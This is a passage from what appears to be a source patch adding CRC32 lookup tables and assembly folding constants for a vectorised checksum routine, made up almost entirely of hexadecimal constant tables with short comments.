0x4b5fa6e6, 0xb93425e5, 0x6dfe410e, 0x9f95c20d, 0x8cc531f9, 0x7eaeb2fa, + 0x30e349b1, 0xc288cab2, 0xd1d83946, 0x23b3ba45, 0xf779deae, 0x05125dad, + 0x1642ae59, 0xe4292d5a, 0xba3a117e, 0x4851927d, 0x5b016189, 0xa96ae28a, + 0x7da08661, 0x8fcb0562, 0x9c9bf696, 0x6ef07595, 0x417b1dbc, 0xb3109ebf, + 0xa0406d4b, 0x522bee48, 0x86e18aa3, 0x748a09a0, 0x67dafa54, 0x95b17957, + 0xcba24573, 0x39c9c670, 0x2a993584, 0xd8f2b687, 0x0c38d26c, 0xfe53516f, + 0xed03a29b, 0x1f682198, 0x5125dad3, 0xa34e59d0, 0xb01eaa24, 0x42752927, + 0x96bf4dcc, 0x64d4cecf, 0x77843d3b, 0x85efbe38, 0xdbfc821c, 0x2997011f, + 0x3ac7f2eb, 0xc8ac71e8, 0x1c661503, 0xee0d9600, 0xfd5d65f4, 0x0f36e6f7, + 0x61c69362, 0x93ad1061, 0x80fde395, 0x72966096, 0xa65c047d, 0x5437877e, + 0x4767748a, 0xb50cf789, 0xeb1fcbad, 0x197448ae, 0x0a24bb5a, 0xf84f3859, + 0x2c855cb2, 0xdeeedfb1, 0xcdbe2c45, 0x3fd5af46, 0x7198540d, 0x83f3d70e, + 0x90a324fa, 0x62c8a7f9, 0xb602c312, 0x44694011, 0x5739b3e5, 0xa55230e6, + 0xfb410cc2, 0x092a8fc1, 0x1a7a7c35, 0xe811ff36, 0x3cdb9bdd, 0xceb018de, + 0xdde0eb2a, 0x2f8b6829, 0x82f63b78, 0x709db87b, 0x63cd4b8f, 0x91a6c88c, + 0x456cac67, 0xb7072f64, 0xa457dc90, 0x563c5f93, 0x082f63b7, 0xfa44e0b4, + 0xe9141340, 0x1b7f9043, 0xcfb5f4a8, 0x3dde77ab, 0x2e8e845f, 0xdce5075c, + 0x92a8fc17, 0x60c37f14, 0x73938ce0, 0x81f80fe3, 0x55326b08, 0xa759e80b, + 0xb4091bff, 0x466298fc, 0x1871a4d8, 0xea1a27db, 0xf94ad42f, 0x0b21572c, + 0xdfeb33c7, 0x2d80b0c4, 0x3ed04330, 0xccbbc033, 0xa24bb5a6, 0x502036a5, + 0x4370c551, 0xb11b4652, 0x65d122b9, 0x97baa1ba, 0x84ea524e, 0x7681d14d, + 0x2892ed69, 0xdaf96e6a, 0xc9a99d9e, 0x3bc21e9d, 0xef087a76, 0x1d63f975, + 0x0e330a81, 0xfc588982, 0xb21572c9, 0x407ef1ca, 0x532e023e, 0xa145813d, + 0x758fe5d6, 0x87e466d5, 0x94b49521, 0x66df1622, 0x38cc2a06, 0xcaa7a905, + 0xd9f75af1, 0x2b9cd9f2, 0xff56bd19, 0x0d3d3e1a, 0x1e6dcdee, 0xec064eed, + 0xc38d26c4, 0x31e6a5c7, 0x22b65633, 0xd0ddd530, 0x0417b1db, 0xf67c32d8, + 0xe52cc12c, 0x1747422f, 0x49547e0b, 0xbb3ffd08, 0xa86f0efc, 0x5a048dff, + 0x8ecee914, 0x7ca56a17, 0x6ff599e3, 0x9d9e1ae0, 0xd3d3e1ab, 0x21b862a8, + 0x32e8915c, 0xc083125f, 0x144976b4, 0xe622f5b7, 0xf5720643, 0x07198540, + 0x590ab964, 0xab613a67, 0xb831c993, 0x4a5a4a90, 0x9e902e7b, 0x6cfbad78, + 0x7fab5e8c, 0x8dc0dd8f, 0xe330a81a, 0x115b2b19, 0x020bd8ed, 0xf0605bee, + 0x24aa3f05, 0xd6c1bc06, 0xc5914ff2, 0x37faccf1, 0x69e9f0d5, 0x9b8273d6, + 0x88d28022, 0x7ab90321, 0xae7367ca, 0x5c18e4c9, 0x4f48173d, 0xbd23943e, + 0xf36e6f75, 0x0105ec76, 0x12551f82, 0xe03e9c81, 0x34f4f86a, 0xc69f7b69, + 0xd5cf889d, 0x27a40b9e, 0x79b737ba, 0x8bdcb4b9, 0x988c474d, 0x6ae7c44e, + 0xbe2da0a5, 0x4c4623a6, 0x5f16d052, 0xad7d5351, +}; + +#endif + +#else +#define MAX_SIZE 32768 +.constants : + + /* Reduce 262144 kbits to 1024 bits */ + /* x^261120 mod p(x)` << 1, x^261184 mod p(x)` << 1 */ + .octa 0x00000000b6ca9e20000000009c37c408 + + /* x^260096 mod p(x)` << 1, x^260160 mod p(x)` << 1 */ + .octa 0x00000000350249a800000001b51df26c + + /* x^259072 mod p(x)` << 1, x^259136 mod p(x)` << 1 */ + .octa 0x00000001862dac54000000000724b9d0 + + /* x^258048 mod p(x)` << 1, x^258112 mod p(x)` << 1 */ + .octa 0x00000001d87fb48c00000001c00532fe + + /* x^257024 mod p(x)` << 1, x^257088 mod p(x)` << 1 */ + .octa 0x00000001f39b699e00000000f05a9362 + + /* x^256000 mod p(x)` << 1, x^256064 mod p(x)` << 1 */ + .octa 0x0000000101da11b400000001e1007970 + + /* x^254976 mod p(x)` << 1, x^255040 mod p(x)` << 1 */ + .octa 0x00000001cab571e000000000a57366ee + + /* x^253952 mod p(x)` << 1, x^254016 mod p(x)` << 1 */ + .octa 0x00000000c7020cfe0000000192011284 + + /* x^252928 mod p(x)` << 1, x^252992 mod p(x)` << 1 */ + .octa 0x00000000cdaed1ae0000000162716d9a + + /* x^251904 mod p(x)` << 1, x^251968 mod p(x)` << 1 */ + .octa 0x00000001e804effc00000000cd97ecde + + /* x^250880 mod p(x)` << 1, x^250944 mod p(x)` << 1 */ + .octa 0x0000000077c3ea3a0000000058812bc0 + + /* x^249856 mod p(x)` << 1, x^249920 mod p(x)` << 1 */ + .octa 0x0000000068df31b40000000088b8c12e + + /* x^248832 mod p(x)` << 1, x^248896 mod p(x)` << 1 */ + .octa 0x00000000b059b6c200000001230b234c + + /* x^247808 mod p(x)` << 1, x^247872 mod p(x)` << 1 */ + .octa 0x0000000145fb8ed800000001120b416e + + /* x^246784 mod p(x)` << 1, x^246848 mod p(x)` << 1 */ + .octa 0x00000000cbc0916800000001974aecb0 + + /* x^245760 mod p(x)` << 1, x^245824 mod p(x)` << 1 */ + .octa 0x000000005ceeedc2000000008ee3f226 + + /* x^244736 mod p(x)` << 1, x^244800 mod p(x)` << 1 */ + .octa 0x0000000047d74e8600000001089aba9a + + /* x^243712 mod p(x)` << 1, x^243776 mod p(x)` << 1 */ + .octa 0x00000001407e9e220000000065113872 + + /* x^242688 mod p(x)` << 1, x^242752 mod p(x)` << 1 */ + .octa 0x00000001da967bda000000005c07ec10 + + /* x^241664 mod p(x)` << 1, x^241728 mod p(x)` << 1 */ + .octa 0x000000006c8983680000000187590924 + + /* x^240640 mod p(x)` << 1, x^240704 mod p(x)` << 1 */ + .octa 0x00000000f2d14c9800000000e35da7c6 + + /* x^239616 mod p(x)` << 1, x^239680 mod p(x)` << 1 */ + .octa 0x00000001993c6ad4000000000415855a + + /* x^238592 mod p(x)` << 1, x^238656 mod p(x)` << 1 */ + .octa 0x000000014683d1ac0000000073617758 + + /* x^237568 mod p(x)` << 1, x^237632 mod p(x)` << 1 */ + .octa 0x00000001a7c93e6c0000000176021d28 + + /* x^236544 mod p(x)` << 1, x^236608 mod p(x)` << 1 */ + .octa 0x000000010211e90a00000001c358fd0a + + /* x^235520 mod p(x)` << 1, x^235584 mod p(x)` << 1 */ + .octa 0x000000001119403e00000001ff7a2c18 + + /* x^234496 mod p(x)` << 1, x^234560 mod p(x)` << 1 */ + .octa 0x000000001c3261aa00000000f2d9f7e4 + + /* x^233472 mod p(x)` << 1, x^233536 mod p(x)` << 1 */ + .octa 0x000000014e37a634000000016cf1f9c8 + + /* x^232448 mod p(x)` << 1, x^232512 mod p(x)` << 1 */ + .octa 0x0000000073786c0c000000010af9279a + + /* x^231424 mod p(x)` << 1, x^231488 mod p(x)` << 1 */ + .octa 0x000000011dc037f80000000004f101e8 + + /* x^230400 mod p(x)` << 1, x^230464 mod p(x)` << 1 */ + .octa 0x0000000031433dfc0000000070bcf184 + + /* x^229376 mod p(x)` << 1, x^229440 mod p(x)` << 1 */ + .octa 0x000000009cde8348000000000a8de642 + + /* x^228352 mod p(x)` << 1, x^228416 mod p(x)` << 1 */ + .octa 0x0000000038d3c2a60000000062ea130c + + /* x^227328 mod p(x)` << 1, x^227392 mod p(x)` << 1 */ + .octa 0x000000011b25f26000000001eb31cbb2 + + /* x^226304 mod p(x)` << 1, x^226368 mod p(x)` << 1 */ + .octa 0x000000001629e6f00000000170783448 + + /* x^225280 mod p(x)` << 1, x^225344 mod p(x)` << 1 */ + .octa 0x0000000160838b4c00000001a684b4c6 + + /* x^224256 mod p(x)` << 1, x^224320 mod p(x)` << 1 */ + .octa 0x000000007a44011c00000000253ca5b4 + + /* x^223232 mod p(x)` << 1, x^223296 mod p(x)` << 1 */ + .octa 0x00000000226f417a0000000057b4b1e2 + + /* x^222208 mod p(x)` << 1, x^222272 mod p(x)` << 1 */ + .octa 0x0000000045eb2eb400000000b6bd084c + + /* x^221184 mod p(x)` << 1, x^221248 mod p(x)` << 1 */ + .octa 0x000000014459d70c0000000123c2d592 + + /* x^220160 mod p(x)` << 1, x^220224 mod p(x)` << 1 */ + .octa 0x00000001d406ed8200000000159dafce + + /* x^219136 mod p(x)` << 1, x^219200 mod p(x)` << 1 */ + .octa 0x0000000160c8e1a80000000127e1a64e + + /* x^218112 mod p(x)` << 1, x^218176 mod p(x)` << 1 */ + .octa 0x0000000027ba80980000000056860754 + + /* x^217088 mod p(x)` << 1, x^217152 mod p(x)` << 1 */ + .octa 0x000000006d92d01800000001e661aae8 + + /* x^216064 mod p(x)` << 1, x^216128 mod p(x)` << 1 */ + .octa 0x000000012ed7e3f200000000f82c6166 + + /* x^215040 mod p(x)` << 1, x^215104 mod p(x)` << 1 */ + .octa 0x000000002dc8778800000000c4f9c7ae + + /* x^214016 mod p(x)` << 1, x^214080 mod p(x)` << 1 */ + .octa 0x0000000018240bb80000000074203d20 + + /* x^212992 mod p(x)` << 1, x^213056 mod p(x)` << 1 */ + .octa 0x000000001ad381580000000198173052 + + /* x^211968 mod p(x)` << 1, x^212032 mod p(x)` << 1 */ + .octa 0x00000001396b78f200000001ce8aba54 + + /* x^210944 mod p(x)` << 1, x^211008 mod p(x)` << 1 */ + .octa 0x000000011a68133400000001850d5d94 + + /* x^209920 mod p(x)` << 1, x^209984 mod p(x)` << 1 */ + .octa 0x000000012104732e00000001d609239c + + /* x^208896 mod p(x)` << 1, x^208960 mod p(x)` << 1 */ + .octa 0x00000000a140d90c000000001595f048 + + /* x^207872 mod p(x)` << 1, x^207936 mod p(x)` << 1 */ + .octa 0x00000001b7215eda0000000042ccee08 + + /* x^206848 mod p(x)` << 1, x^206912 mod p(x)` << 1 */ + .octa 0x00000001aaf1df3c000000010a389d74 + + /* x^205824 mod p(x)` << 1, x^205888 mod p(x)` << 1 */ + .octa 0x0000000029d15b8a000000012a840da6 + + /* x^204800 mod p(x)` << 1, x^204864 mod p(x)` << 1 */ + .octa 0x00000000f1a96922000000001d181c0c + + /* x^203776 mod p(x)` << 1, x^203840 mod p(x)` << 1 */ + .octa 0x00000001ac80d03c0000000068b7d1f6 + + /* x^202752 mod p(x)` << 1, x^202816 mod p(x)` << 1 */ + .octa 0x000000000f11d56a000000005b0f14fc + + /* x^201728 mod p(x)` << 1, x^201792 mod p(x)` << 1 */ + .octa 0x00000001f1c022a20000000179e9e730 + + /* x^200704 mod p(x)` << 1, x^200768 mod p(x)` << 1 */ + .octa 0x0000000173d00ae200000001ce1368d6 + + /* x^199680 mod p(x)` << 1, x^199744 mod p(x)` << 1 */ + .octa 0x00000001d4ffe4ac0000000112c3a84c + + /* x^198656 mod p(x)` << 1, x^198720 mod p(x)` << 1 */ + .octa 0x000000016edc5ae400000000de940fee + + /* x^197632 mod p(x)` << 1, x^197696 mod p(x)` << 1 */ + .octa 0x00000001f1a0214000000000fe896b7e + + /* x^196608 mod p(x)` << 1, x^196672 mod p(x)` << 1 */ + .octa 0x00000000ca0b28a000000001f797431c + + /* x^195584 mod p(x)` << 1, x^195648 mod p(x)` << 1 */ + .octa 0x00000001928e30a20000000053e989ba + + /* x^194560 mod p(x)` << 1, x^194624 mod p(x)` << 1 */ + .octa 0x0000000097b1b002000000003920cd16 + + /* x^193536 mod p(x)` << 1, x^193600 mod p(x)` << 1 */ + .octa 0x00000000b15bf90600000001e6f579b8 + + /* x^192512 mod p(x)` << 1, x^192576 mod p(x)` << 1 */ + .octa 0x00000000411c5d52000000007493cb0a + + /* x^191488 mod p(x)` << 1, x^191552 mod p(x)` << 1 */ + .octa 0x00000001c36f330000000001bdd376d8 + + /* x^190464 mod p(x)` << 1, x^190528 mod p(x)` << 1 */ + .octa 0x00000001119227e0000000016badfee6 + + /* x^189440 mod p(x)` << 1, x^189504 mod p(x)` << 1 */ + .octa 0x00000000114d47020000000071de5c58 + + /* x^188416 mod p(x)` << 1, x^188480 mod p(x)` << 1 */ + .octa 0x00000000458b5b9800000000453f317c + + /* x^187392 mod p(x)` << 1, x^187456 mod p(x)` << 1 */ + .octa 0x000000012e31fb8e0000000121675cce + + /* x^186368 mod p(x)` << 1, x^186432 mod p(x)` << 1 */ + .octa 0x000000005cf619d800000001f409ee92 + + /* x^185344 mod p(x)` << 1, x^185408 mod p(x)` << 1 */ + .octa 0x0000000063f4d8b200000000f36b9c88 + + /* x^184320 mod p(x)` << 1, x^184384 mod p(x)` << 1 */ + .octa 0x000000004138dc8a0000000036b398f4 + + /* x^183296 mod p(x)` << 1, x^183360 mod p(x)` << 1 */ + .octa 0x00000001d29ee8e000000001748f9adc + + /* x^182272 mod p(x)` << 1, x^182336 mod p(x)` << 1 */ + .octa 0x000000006a08ace800000001be94ec00 + + /* x^181248 mod p(x)` << 1, x^181312 mod p(x)` << 1 */ + .octa 0x0000000127d4201000000000b74370d6 + + /* x^180224 mod p(x)` << 1, x^180288 mod p(x)` << 1 */ + .octa 0x0000000019d76b6200000001174d0b98 + + /* x^179200 mod p(x)` << 1, x^179264 mod p(x)` << 1 */ + .octa 0x00000001b1471f6e00000000befc06a4 + + /* x^178176 mod p(x)` << 1, x^178240 mod p(x)` << 1 */ + .octa 0x00000001f64c19cc00000001ae125288 + + /* x^177152 mod p(x)` << 1, x^177216 mod p(x)` << 1 */ + .octa 0x00000000003c0ea00000000095c19b34 + + /* x^176128 mod p(x)` << 1, x^176192 mod p(x)` << 1 */ + .octa 0x000000014d73abf600000001a78496f2 + + /* x^175104 mod p(x)` << 1, x^175168 mod p(x)` << 1 */ + .octa 0x00000001620eb84400000001ac5390a0 + + /* x^174080 mod p(x)` << 1, x^174144 mod p(x)` << 1 */ + .octa 0x0000000147655048000000002a80ed6e + + /* x^173056 mod p(x)` << 1, x^173120 mod p(x)` << 1 */ + .octa 0x0000000067b5077e00000001fa9b0128 + + /* x^172032 mod p(x)` << 1, x^172096 mod p(x)` << 1 */ + .octa 0x0000000010ffe20600000001ea94929e + + /* x^171008 mod p(x)` << 1, x^171072 mod p(x)` << 1 */ + .octa 0x000000000fee8f1e0000000125f4305c + + /* x^169984 mod p(x)` << 1, x^170048 mod p(x)` << 1 */ + .octa 0x00000001da26fbae00000001471e2002 + + /* x^168960 mod p(x)` << 1, x^169024 mod p(x)` << 1 */ + .octa 0x00000001b3a8bd880000000132d2253a + + /* x^167936 mod p(x)` << 1, x^168000 mod p(x)` << 1 */ + .octa 0x00000000e8f3898e00000000f26b3592 + + /* x^166912 mod p(x)` << 1, x^166976 mod p(x)` << 1 */ + .octa 0x00000000b0d0d28c00000000bc8b67b0 + + /* x^165888 mod p(x)` << 1, x^165952 mod p(x)` << 1 */ + .octa 0x0000000030f2a798000000013a826ef2 + + /* x^164864 mod p(x)` << 1, x^164928 mod p(x)` << 1 */ + .octa 0x000000000fba10020000000081482c84 + + /* x^163840 mod p(x)` << 1, x^163904 mod p(x)` << 1 */ + .octa 0x00000000bdb9bd7200000000e77307c2 + + /* x^162816 mod p(x)` << 1, x^162880 mod p(x)` << 1 */ + .octa 0x0000000075d3bf5a00000000d4a07ec8 + + /* x^161792 mod p(x)` << 1, x^161856 mod p(x)` << 1 */ + .octa 0x00000000ef1f98a00000000017102100 + + /* x^160768 mod p(x)` << 1, x^160832 mod p(x)` << 1 */ + .octa 0x00000000689c760200000000db406486 + + /* x^159744 mod p(x)` << 1, x^159808 mod p(x)` << 1 */ + .octa 0x000000016d5fa5fe0000000192db7f88 + + /* x^158720 mod p(x)` << 1, x^158784 mod p(x)` << 1 */ + .octa 0x00000001d0d2b9ca000000018bf67b1e + + /* x^157696 mod p(x)` << 1, x^157760 mod p(x)` << 1 */ + .octa 0x0000000041e7b470000000007c09163e + + /* x^156672 mod p(x)` << 1, x^156736 mod p(x)` << 1 */ + .octa 0x00000001cbb6495e000000000adac060 + + /* x^155648 mod p(x)` << 1, x^155712 mod p(x)` << 1 */ + .octa 0x000000010052a0b000000000bd8316ae + + /* x^154624 mod p(x)` << 1, x^154688 mod p(x)` << 1 */ + .octa 0x00000001d8effb5c000000019f09ab54 + + /* x^153600 mod p(x)` << 1, x^153664 mod p(x)` << 1 */ + .octa 0x00000001d969853c0000000125155542 + + /* x^152576 mod p(x)` << 1, x^152640 mod p(x)` << 1 */ + .octa 0x00000000523ccce2000000018fdb5882 + + /* x^151552 mod p(x)` << 1, x^151616 mod p(x)` << 1 */ + .octa 0x000000001e2436bc00000000e794b3f4 + + /* x^150528 mod p(x)` << 1, x^150592 mod p(x)` << 1 */ + .octa 0x00000000ddd1c3a2000000016f9bb022 + + /* x^149504 mod p(x)` << 1, x^149568 mod p(x)` << 1 */ + .octa 0x0000000019fcfe3800000000290c9978 + + /* x^148480 mod p(x)` << 1, x^148544 mod p(x)` << 1 */ + .octa 0x00000001ce95db640000000083c0f350 + + /* x^147456 mod p(x)` << 1, x^147520 mod p(x)` << 1 */ + .octa 0x00000000af5828060000000173ea6628 + + /* x^146432 mod p(x)` << 1, x^146496 mod p(x)` << 1 */ + .octa 0x00000001006388f600000001c8b4e00a + + /* x^145408 mod p(x)` << 1, x^145472 mod p(x)` << 1 */ + .octa 0x0000000179eca00a00000000de95d6aa + + /* x^144384 mod p(x)` << 1, x^144448 mod p(x)` << 1 */ + .octa 0x0000000122410a6a000000010b7f7248 + + /* x^143360 mod p(x)` << 1, x^143424 mod p(x)` << 1 */ + .octa 0x000000004288e87c00000001326e3a06 + + /* x^142336 mod p(x)` << 1, x^142400 mod p(x)` << 1 */ + .octa 0x000000016c5490da00000000bb62c2e6 + + /* x^141312 mod p(x)` << 1, x^141376 mod p(x)` << 1 */ + .octa 0x00000000d1c71f6e0000000156a4b2c2 + + /* x^140288 mod p(x)` << 1, x^140352 mod p(x)` << 1 */ + .octa 0x00000001b4ce08a6000000011dfe763a + + /* x^139264 mod p(x)` << 1, x^139328 mod p(x)` << 1 */ + .octa 0x00000001466ba60c000000007bcca8e2 + + /* x^138240 mod p(x)` << 1, x^138304 mod p(x)` << 1 */ + .octa 0x00000001f6c488a40000000186118faa + + /* x^137216 mod p(x)` << 1, x^137280 mod p(x)` << 1 */ + .octa 0x000000013bfb06820000000111a65a88 + + /* x^136192 mod p(x)` << 1, x^136256 mod p(x)` << 1 */ + .octa 0x00000000690e9e54000000003565e1c4 + + /* x^135168 mod p(x)` << 1, x^135232 mod p(x)` << 1 */ + .octa 0x00000000281346b6000000012ed02a82 + + /* x^134144 mod p(x)` << 1, x^134208 mod p(x)` << 1 */ + .octa 0x000000015646402400000000c486ecfc + + /* x^133120 mod p(x)` << 1, x^133184 mod p(x)` << 1 */ + .octa 0x000000016063a8dc0000000001b951b2 + + /* x^132096 mod p(x)` << 1, x^132160 mod p(x)` << 1 */ + .octa 0x0000000116a663620000000048143916 + + /* x^131072 mod p(x)` << 1, x^131136 mod p(x)` << 1 */ + .octa 0x000000017e8aa4d200000001dc2ae124 + + /* x^130048 mod p(x)` << 1, x^130112 mod p(x)` << 1 */ + .octa 0x00000001728eb10c00000001416c58d6 + + /* x^129024 mod p(x)` << 1, x^129088 mod p(x)` << 1 */ + .octa 0x00000001b08fd7fa00000000a479744a + + /* x^128000 mod p(x)` << 1, x^128064 mod p(x)` << 1 */ + .octa 0x00000001092a16e80000000096ca3a26 + + /* x^126976 mod p(x)` << 1, x^127040 mod p(x)` << 1 */ + .octa 0x00000000a505637c00000000ff223d4e + + /* x^125952 mod p(x)` << 1, x^126016 mod p(x)` << 1 */ + .octa 0x00000000d94869b2000000010e84da42 + + /* x^124928 mod p(x)` << 1, x^124992 mod p(x)` << 1 */ + .octa 0x00000001c8b203ae00000001b61ba3d0 + + /* x^123904 mod p(x)` << 1, x^123968 mod p(x)` << 1 */ + .octa 0x000000005704aea000000000680f2de8 + + /* x^122880 mod p(x)` << 1, x^122944 mod p(x)` << 1 */ + .octa 0x000000012e295fa2000000008772a9a8 + + /* x^121856 mod p(x)` << 1, x^121920 mod p(x)` << 1 */ + .octa 0x000000011d0908bc0000000155f295bc + + /* x^120832 mod p(x)` << 1, x^120896 mod p(x)` << 1 */ + .octa 0x0000000193ed97ea00000000595f9282 + + /* x^119808 mod p(x)` << 1, x^119872 mod p(x)` << 1 */ + .octa 0x000000013a0f1c520000000164b1c25a + + /* x^118784 mod p(x)` << 1, x^118848 mod p(x)` << 1 */ + .octa 0x000000010c2c40c000000000fbd67c50 + + /* x^117760 mod p(x)` << 1, x^117824 mod p(x)` << 1 */ + .octa 0x00000000ff6fac3e0000000096076268 + + /* x^116736 mod p(x)` << 1, x^116800 mod p(x)` << 1 */ + .octa 0x000000017b3609c000000001d288e4cc + + /* x^115712 mod p(x)` << 1, x^115776 mod p(x)` << 1 */ + .octa 0x0000000088c8c92200000001eaac1bdc + + /* x^114688 mod p(x)` << 1, x^114752 mod p(x)` << 1 */ + .octa 0x00000001751baae600000001f1ea39e2 + + /* x^113664 mod p(x)` << 1, x^113728 mod p(x)` << 1 */ + .octa 0x000000010795297200000001eb6506fc + + /* x^112640 mod p(x)` << 1, x^112704 mod p(x)` << 1 */ + .octa 0x0000000162b00abe000000010f806ffe + + /* x^111616 mod p(x)` << 1, x^111680 mod p(x)` << 1 */ + .octa 0x000000000d7b404c000000010408481e + + /* x^110592 mod p(x)` << 1, x^110656 mod p(x)` << 1 */ + .octa 0x00000000763b13d40000000188260534 + + /* x^109568 mod p(x)` << 1, x^109632 mod p(x)` << 1 */ + .octa 0x00000000f6dc22d80000000058fc73e0 + + /* x^108544 mod p(x)` << 1, x^108608 mod p(x)` << 1 */ + .octa 0x000000007daae06000000000391c59b8 + + /* x^107520 mod p(x)` << 1, x^107584 mod p(x)` << 1 */ + .octa 0x000000013359ab7c000000018b638400 + + /* x^106496 mod p(x)` << 1, x^106560 mod p(x)` << 1 */ + .octa 0x000000008add438a000000011738f5c4 + + /* x^105472 mod p(x)` << 1, x^105536 mod p(x)` << 1 */ + .octa 0x00000001edbefdea000000008cf7c6da + + /* x^104448 mod p(x)` << 1, x^104512 mod p(x)` << 1 */ + .octa 0x000000004104e0f800000001ef97fb16 + + /* x^103424 mod p(x)` << 1, x^103488 mod p(x)` << 1 */ + .octa 0x00000000b48a82220000000102130e20 + + /* x^102400 mod p(x)` << 1, x^102464 mod p(x)` << 1 */ + .octa 0x00000001bcb4684400000000db968898 + + /* x^101376 mod p(x)` << 1, x^101440 mod p(x)` << 1 */ + .octa 0x000000013293ce0a00000000b5047b5e + + /* x^100352 mod p(x)` << 1, x^100416 mod p(x)` << 1 */ + .octa 0x00000001710d0844000000010b90fdb2 + + /* x^99328 mod p(x)` << 1, x^99392 mod p(x)` << 1 */ + .octa 0x0000000117907f6e000000004834a32e + + /* x^98304 mod p(x)` << 1, x^98368 mod p(x)` << 1 */ + .octa 0x0000000087ddf93e0000000059c8f2b0 + + /* x^97280 mod p(x)` << 1, x^97344 mod p(x)` << 1 */ + .octa 0x000000005970e9b00000000122cec508 + + /* x^96256 mod p(x)` << 1, x^96320 mod p(x)` << 1 */ + .octa 0x0000000185b2b7d0000000000a330cda + + /* x^95232 mod p(x)` << 1, x^95296 mod p(x)` << 1 */ + .octa 0x00000001dcee0efc000000014a47148c + + /* x^94208 mod p(x)` << 1, x^94272 mod p(x)` << 1 */ + .octa 0x0000000030da27220000000042c61cb8 + + /* x^93184 mod p(x)` << 1, x^93248 mod p(x)` << 1 */ + .octa 0x000000012f925a180000000012fe6960 + + /* x^92160 mod p(x)` << 1, x^92224 mod p(x)` << 1 */ + .octa 0x00000000dd2e357c00000000dbda2c20 + + /* x^91136 mod p(x)` << 1, x^91200 mod p(x)` << 1 */ + .octa 0x00000000071c80de000000011122410c + + /* x^90112 mod p(x)` << 1, x^90176 mod p(x)` << 1 */ + .octa 0x000000011513140a00000000977b2070 + + /* x^89088 mod p(x)` << 1, x^89152 mod p(x)` << 1 */ + .octa 0x00000001df876e8e000000014050438e + + /* x^88064 mod p(x)` << 1, x^88128 mod p(x)` << 1 */ + .octa 0x000000015f81d6ce0000000147c840e8 + + /* x^87040 mod p(x)` << 1, x^87104 mod p(x)` << 1 */ + .octa 0x000000019dd94dbe00000001cc7c88ce + + /* x^86016 mod p(x)` << 1, x^86080 mod p(x)` << 1 */ + .octa 0x00000001373d206e00000001476b35a4 + + /* x^84992 mod p(x)` << 1, x^85056 mod p(x)` << 1 */ + .octa 0x00000000668ccade000000013d52d508 + + /* x^83968 mod p(x)` << 1, x^84032 mod p(x)` << 1 */ + .octa 0x00000001b192d268000000008e4be32e + + /* x^82944 mod p(x)` << 1, x^83008 mod p(x)` << 1 */ + .octa 0x00000000e30f3a7800000000024120fe + + /* x^81920 mod p(x)` << 1, x^81984 mod p(x)` << 1 */ + .octa 0x000000010ef1f7bc00000000ddecddb4 + + /* x^80896 mod p(x)` << 1, x^80960 mod p(x)` << 1 */ + .octa 0x00000001f5ac738000000000d4d403bc + + /* x^79872 mod p(x)` << 1, x^79936 mod p(x)` << 1 */ + .octa 0x000000011822ea7000000001734b89aa + + /* x^78848 mod p(x)` << 1, x^78912 mod p(x)` << 1 */ + .octa 0x00000000c3a33848000000010e7a58d6 + + /* x^77824 mod p(x)` << 1, x^77888 mod p(x)` << 1 */ + .octa 0x00000001bd151c2400000001f9f04e9c + + /* x^76800 mod p(x)` << 1, x^76864 mod p(x)` << 1 */ + .octa 0x0000000056002d7600000000b692225e + + /* x^75776 mod p(x)` << 1, x^75840 mod p(x)` << 1 */ + .octa 0x000000014657c4f4000000019b8d3f3e + + /* x^74752 mod p(x)` << 1, x^74816 mod p(x)` << 1 */ + .octa 0x0000000113742d7c00000001a874f11e + + /* x^73728 mod p(x)` << 1, x^73792 mod p(x)` << 1 */ + .octa 0x000000019c5920ba000000010d5a4254 + + /* x^72704 mod p(x)` << 1, x^72768 mod p(x)` << 1 */ + .octa 0x000000005216d2d600000000bbb2f5d6 + + /* x^71680 mod p(x)` << 1, x^71744 mod p(x)` << 1 */ + .octa 0x0000000136f5ad8a0000000179cc0e36 + + /* x^70656 mod p(x)` << 1, x^70720 mod p(x)` << 1 */ + .octa 0x000000018b07beb600000001dca1da4a + + /* x^69632 mod p(x)` << 1, x^69696 mod p(x)` << 1 */ + .octa 0x00000000db1e93b000000000feb1a192 + + /* x^68608 mod p(x)` << 1, x^68672 mod p(x)` << 1 */ + .octa 0x000000000b96fa3a00000000d1eeedd6 + + /* x^67584 mod p(x)` << 1, x^67648 mod p(x)` << 1 */ + .octa 0x00000001d9968af0000000008fad9bb4 + + /* x^66560 mod p(x)` << 1, x^66624 mod p(x)` << 1 */ + .octa 0x000000000e4a77a200000001884938e4 + + /* x^65536 mod p(x)` << 1, x^65600 mod p(x)` << 1 */ + .octa 0x00000000508c2ac800000001bc2e9bc0 + + /* x^64512 mod p(x)` << 1, x^64576 mod p(x)` << 1 */ + .octa 0x0000000021572a8000000001f9658a68 + + /* x^63488 mod p(x)` << 1, x^63552 mod p(x)` << 1 */ + .octa 0x00000001b859daf2000000001b9224fc + + /* x^62464 mod p(x)` << 1, x^62528 mod p(x)` << 1 */ + .octa 0x000000016f7884740000000055b2fb84 + + /* x^61440 mod p(x)` << 1, x^61504 mod p(x)` << 1 */ + .octa 0x00000001b438810e000000018b090348 + + /* x^60416 mod p(x)` << 1, x^60480 mod p(x)` << 1 */ + .octa 0x0000000095ddc6f2000000011ccbd5ea + + /* x^59392 mod p(x)` << 1, x^59456 mod p(x)` << 1 */ + .octa 0x00000001d977c20c0000000007ae47f8 + + /* x^58368 mod p(x)` << 1, x^58432 mod p(x)` << 1 */ + .octa 0x00000000ebedb99a0000000172acbec0 + + /* x^57344 mod p(x)` << 1, x^57408 mod p(x)` << 1 */ + .octa 0x00000001df9e9e9200000001c6e3ff20 + + /* x^56320 mod p(x)` << 1, x^56384 mod p(x)` << 1 */ + .octa 0x00000001a4a3f95200000000e1b38744 + + /* x^55296 mod p(x)` << 1, x^55360 mod p(x)` << 1 */ + .octa 0x00000000e2f5122000000000791585b2 + + /* x^54272 mod p(x)` << 1, x^54336 mod p(x)` << 1 */ + .octa 0x000000004aa01f3e00000000ac53b894 + + /* x^53248 mod p(x)` << 1, x^53312 mod p(x)` << 1 */ + .octa 0x00000000b3e90a5800000001ed5f2cf4 + + /* x^52224 mod p(x)` << 1, x^52288 mod p(x)` << 1 */ + .octa 0x000000000c9ca2aa00000001df48b2e0 + + /* x^51200 mod p(x)` << 1, x^51264 mod p(x)` << 1 */ + .octa 0x000000015168231600000000049c1c62 + + /* x^50176 mod p(x)` << 1, x^50240 mod p(x)` << 1 */ + .octa 0x0000000036fce78c000000017c460c12 + + /* x^49152 mod p(x)` << 1, x^49216 mod p(x)` << 1 */ + .octa 0x000000009037dc10000000015be4da7e + + /* x^48128 mod p(x)` << 1, x^48192 mod p(x)` << 1 */ + .octa 0x00000000d3298582000000010f38f668 